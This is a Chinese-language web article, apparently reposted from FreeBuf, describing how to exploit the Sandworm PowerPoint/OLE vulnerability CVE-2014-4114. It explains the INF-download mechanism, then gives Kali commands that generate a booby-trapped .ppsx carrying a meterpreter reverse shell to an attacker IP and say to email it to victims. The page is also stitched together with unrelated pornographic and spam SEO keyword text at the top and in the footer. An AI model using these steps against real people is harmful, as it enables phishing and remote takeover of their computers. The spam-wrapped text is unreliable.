成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

沙蟲漏洞(CVE-2014-4114)利用測試方法

安全 漏洞
CVE-2014-4114 是OLE包管理INF 任意代碼執(zhí)行漏洞,該漏洞影響Win Vista,Win7等以上操作系統(tǒng),通過使用PowerPoint作為攻擊載體,該漏洞是出現(xiàn)在Microsoft Windows和服務(wù)器上的OLE包管理器。在OLE打包文件(packer.dll)中能夠下載并執(zhí)行類似的INF外部文件,允許攻擊者執(zhí)行命令。

本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險自負(fù)!

漏洞時間:2014年10月底

測試目標(biāo):裝有office2007,office2013的機(jī)器。

漏洞說明:此漏洞目前主要被黑客組織用來進(jìn)行APT(Advanced Persistent Threat)攻擊,或者稱之為“針對特定目標(biāo)的攻擊”。主要針對政府等大型企業(yè),通過發(fā)送郵件的方式進(jìn)行攻擊。

CVE-2014-4114 是OLE包管理INF 任意代碼執(zhí)行漏洞,該漏洞影響Win Vista,Win7等以上操作系統(tǒng),通過使用PowerPoint作為攻擊載體,該漏洞是出現(xiàn)在Microsoft Windows和服務(wù)器上的OLE包管理器。在OLE打包文件(packer.dll)中能夠下載并執(zhí)行類似的INF外部文件,允許攻擊者執(zhí)行命令。

利用測試意在了解漏洞的危害,以進(jìn)行更好的防御。

漏洞原理

1.用到分析工具 filealyzer.

2.通過分析工具我們可以看到這個文件嵌入了兩個OLE 對象,如下:

OleObject2.bin中的\\192.9.205.102\share\slides.inf, 字符串,是一個webdav路徑,下載后發(fā)現(xiàn)是一個INF文件。oleObject1.bin是一個GIF文件。

沙蟲漏洞(CVE-2014-4114)利用測試方法 

沙蟲漏洞(CVE-2014-4114)利用測試方法

 

2.當(dāng)該文件被PPT加載后,它會調(diào)用Packager.dll的CPackage::OLE2MPlayerReadFromStream函數(shù)將這兩個文件從網(wǎng)絡(luò)上下載下來并保存在臨時目錄中。

3.然后在函數(shù)CPackage::DoVerb中調(diào)用SHELL32!CDefFolderMenu::InvokeCommand函數(shù)加載slides.inf,并安裝這個inf文件。CPackage::DoVerb的關(guān)鍵代碼如下:

沙蟲漏洞(CVE-2014-4114)利用測試方法

4.安裝INF的過程最后是通過調(diào)用C:\Windows\System32\InfDefaultInstall.exe程序來安裝的。如下圖:

沙蟲漏洞(CVE-2014-4114)利用測試方法

5.Slide.inf 的內(nèi)容如下:

沙蟲漏洞(CVE-2014-4114)利用測試方法

 

6.整個INF的主要功能是將slide1.gif重命名為slide1.gif.exe,然后添加注冊表啟動項(xiàng)。

漏洞大概原理就是:

執(zhí)行PPT –> 內(nèi)置2個OLE對象–> OLE對象包含2個遠(yuǎn)程webdav地址 –>調(diào)用packager.dll的函數(shù)CPackage::OLE2MPlayerReadFromStream把遠(yuǎn)程的 slide1.gif slides.inf 下載下來 —> 函數(shù)CPackage::DoVerb中調(diào)用SHELL32!CDefFolderMenu::InvokeCommand函數(shù)加載slides.inf,并安裝這個inf文件–>inf將slide1.gif重命名為slide1.gif.exe。然后添加注冊表啟動項(xiàng)。

目前已經(jīng)出現(xiàn)了把惡意代碼包含在ppt文件中,但我現(xiàn)在的演示是惡意代碼 放在了遠(yuǎn)程共享上。#p#

漏洞演示

vim ms14_060.py 把下面代碼復(fù)制到ms14_060.py中。

kali中的python可能沒有安裝pptx模塊。

我們手工安裝一下。

2.在kali系統(tǒng)搭建smb服務(wù)。把下面代碼復(fù)制到 /etc/samba/smb.conf 中。

mkdir /tmp/share

/etc/init.d/samba restart

3.執(zhí)行下面命令。

python ms14_060.py sploit.pptx 192.9.205.174 -m 7777

產(chǎn)生一個a.ppsx 的文件。和一個slide1.gif的木馬文件,slides.inf 的文件 slide1.gif中的攻擊載荷為 meterpreter/reverce_tcp木馬連接本地IP 192.9.205.174:7777 端口

沙蟲漏洞(CVE-2014-4114)利用測試方法

生成的 aa.ppsx中可以寫任何東西,普通PPT文件。

沙蟲漏洞(CVE-2014-4114)利用測試方法

本地監(jiān)聽 7777端口。

沙蟲漏洞(CVE-2014-4114)利用測試方法

修改ppsx內(nèi)容。

[[122907]]

修改名稱,以郵件或者各種方式發(fā)給需要攻擊者。

[[122908]]

攻擊者打開,反彈回shell

沙蟲漏洞(CVE-2014-4114)利用測試方法

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2014-10-15 17:29:33

2022-06-14 14:59:33

漏洞FollinaWindows

2021-02-09 10:31:04

漏洞webWordPress F

2014-10-14 19:57:08

2025-05-13 08:28:00

漏洞終端安全系統(tǒng)安全

2021-09-10 11:41:20

漏洞Windows 微軟

2009-08-15 10:19:01

漏洞利用php expEXP程序

2025-03-19 12:57:06

2021-01-30 18:31:00

sudo緩存溢出漏洞

2025-02-05 08:10:00

2022-06-14 09:00:21

漏洞補(bǔ)丁

2024-05-15 16:10:15

2012-10-23 16:28:51

2015-01-29 11:47:35

2025-05-12 09:00:00

2021-05-27 05:34:47

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2022-02-10 11:52:10

Windows漏洞Windows 10

2025-02-12 07:54:55

2025-04-29 08:10:00

零日漏洞漏洞網(wǎng)絡(luò)攻擊

2009-07-06 17:47:44

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 日韩中文字幕久久 | 亚洲成av人影片在线观看 | 亚洲欧洲日韩精品 中文字幕 | 亚洲黄色视屏 | 91久久综合亚洲鲁鲁五月天 | 中文在线一区二区 | 粉嫩国产精品一区二区在线观看 | 精品国产欧美日韩不卡在线观看 | 日韩久久久久久久久久久 | 网站黄色在线 | 玩丰满女领导对白露脸hd | 91精品国产一二三 | 久久久国产精品视频 | 精品视频免费在线 | 特黄av| 人人澡人人射 | 特黄特黄a级毛片免费专区 av网站免费在线观看 | a级免费观看视频 | 日本不卡免费新一二三区 | 久久在线看 | 国产精品毛片久久久久久久 | 亚洲精品第一 | 久久一 | 国产98色在线 | 日韩 | 国产精品久久久久久久免费大片 | 欧美中文字幕一区二区三区亚洲 | 在线观看中文字幕视频 | 成人在线免费 | 在线播放第一页 | 亚洲欧美一区二区三区1000 | 综合精品在线 | 成人av网站在线观看 | 国产一区久久久 | 九九热re| 在线91 | 高清久久久 | 亚洲福利网 | 涩涩视频在线播放 | 精品视频亚洲 | 欧美黄a | 国产精品美女www爽爽爽 |